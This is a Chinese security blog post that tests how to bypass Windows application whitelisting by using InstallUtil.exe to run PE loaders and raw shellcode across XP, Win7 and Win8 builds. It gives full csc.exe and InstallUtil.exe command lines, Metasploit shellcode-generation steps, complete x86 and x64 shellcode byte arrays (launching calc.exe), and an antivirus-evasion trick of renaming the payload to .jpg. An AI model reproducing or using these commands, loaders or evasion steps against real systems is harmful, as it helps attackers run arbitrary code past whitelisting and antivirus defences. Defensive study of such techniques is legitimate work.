利用白名单绕过限制的更多测试

三好学生 2015-10-08 10:10:00

0x00 前言


subTee在博客中不仅介绍了如何利用InstallUtil.exe直接执行pe文件,还提到了另一种利用方式——利用InstallUtil执行shellcode从subTee分享的代码可以看出其测试环境为64位、.net4.0环境,在360安全播报上发表的文章也认为执行环境必须是.net4.0以上,适用范围很窄但我并不这么认为

下面我们通过实际测试得出我们的新结论。

注:上述涉及的链接:

0x01 测试目标


测试两种利用InstallUtil的方式,研究其使用环境

0x02 测试环境


xp x86
win7 x86
win7 x64
win8 x86
win8 x64

0x03 测试方法


1、利用InstallUtil.exe执行pe文件

执行代码:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

:上篇有详细介绍,本次不做具体介绍

2、利用InstallUtil.exe直接执行shellcode

下载链接:https://gist.github.com/subTee/a06d4ae23e2517566c52

下载文件保存为Shellcode.cs,按照其描述执行代码:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

0x04 实际测试


:根据不同操作系统版本,需要对上述利用代码作相应修改

1、xp x86

默认不包含.net环境,暂不测试,但可为最终结论提供参考

2、win7 x86

默认.net环境

如图

(1)利用InstallUtil.exe执行pe文件

.net 3.5无法成功编译PELoader.cs

如图

(2)利用InstallUtil.exe直接执行shellcode

通过msf生成32位shellcode

use windows/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp

如图

byte[] buf = new byte[195] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };

替换Shellcode.cs中的byte[] shellcode

使用.net 2.0中的csc.exe和InstallUtil.exe,执行代码:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe  /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

成功执行shellcode,弹出计算器

如图

360成功查杀,如图

2、win7 x64

默认.net环境

如图

(1)利用InstallUtil.exe执行pe文件

.net 3.5无法成功编译PELoader.cs

(2)利用InstallUtil.exe直接执行shellcode

通过msf生成64位shellcode

use windows/x64/exec
set CMD calc.exe
set EXITFUNC thread
generate -t csharp

如图

byte[] buf = new byte[276] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,
0x63,0x2e,0x65,0x78,0x65,0x00 };

替换Shellcode.cs中的byte[] shellcode

使用.net 2.0 x64中的csc.exe和InstallUtil.exe,执行代码:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

成功执行shellcode,弹出计算器

如图

如果使用.net 2.0 x86中的csc.exe和InstallUtil.exe,执行代码:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

会报错,如图

测试exeshellx64.exe查杀情况,360干的不错,查杀,如图

3、win8 x86

默认.net环境,支持4.0

如图

(1)利用InstallUtil.exe执行pe文件

执行代码:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /out:PELoader.exe PELoader.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PELoader.exe

32位系统下执行发生异常

如图

(2)利用InstallUtil.exe直接执行shellcode

使用.net 4.0中的csc.exe和InstallUtil.exe,执行代码:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe  /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

成功执行shellcode,弹出计算器

如图

测试win8x86exeshell.exe查杀情况,360干的漂亮,查杀,如图

4、win8 x64

默认.net环境,支持4.0,如图

(1)利用InstallUtil.exe执行pe文件

.net 4.0成功执行

如图

(2)利用InstallUtil.exe直接执行shellcode

使用.net 4.0 x64中的csc.exe和InstallUtil.exe,执行代码:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

报错,如图

使用.net 4.0 x86中的csc.exe和InstallUtil.exe,执行代码:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe  /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

报错,如图

为了得出正确的结论,在win8 x64系统上面安装.net framework x64 2.0

使用其中的csc.exe和InstallUtil.exe,执行代码:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  /unsafe /platform:x64 /out:exeshell.exe Shellcode.cs

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

成功执行shellcode,弹出计算器

如图

0x05 补充


上述测试中操作系统自带的.net环境并不绝对,如果安装应用 也会默认安装相应版本的.net 环境

0x06 测试结论


(1)利用InstallUtil.exe执行pe文件

适用于64位系统、Microsoft .NET Framework 4.0环境

(2)利用InstallUtil.exe直接执行shellcode

适用于.NET Framework 2.0及特定环境

0x07 关于免杀


仅给出一种简单有效的方法

参照上篇内容的思路,执行代码如下:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /platform:x64 /out:exeshell.jpg Shellcode.cs
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.jpg

更改文件后缀名即可逃过静态查杀,至于主动防御,全过程依然未触发

如图

正常打开是一张损坏的图片

查杀测试如图

但实际上,可以通过这种方式打开,如图

0x08 小结


关于该项技术的利用方式还有很多,思路最重要

关于突破白名单的限制,其他方法比如利用PowerShell、Exploit/Migrate、WMI Providers、.COM代理突破白名单的限制的方法都很值得研究。

本文由三好学生原创并首发于乌云drops,转载请注明

评论

三好学生

good in study,attitude and health

twitter weibo github wechat

随机分类

逆向安全 文章:70 篇
运维安全 文章:62 篇
硬件与物联网 文章:40 篇
APT 文章:6 篇
MongoDB安全 文章:3 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录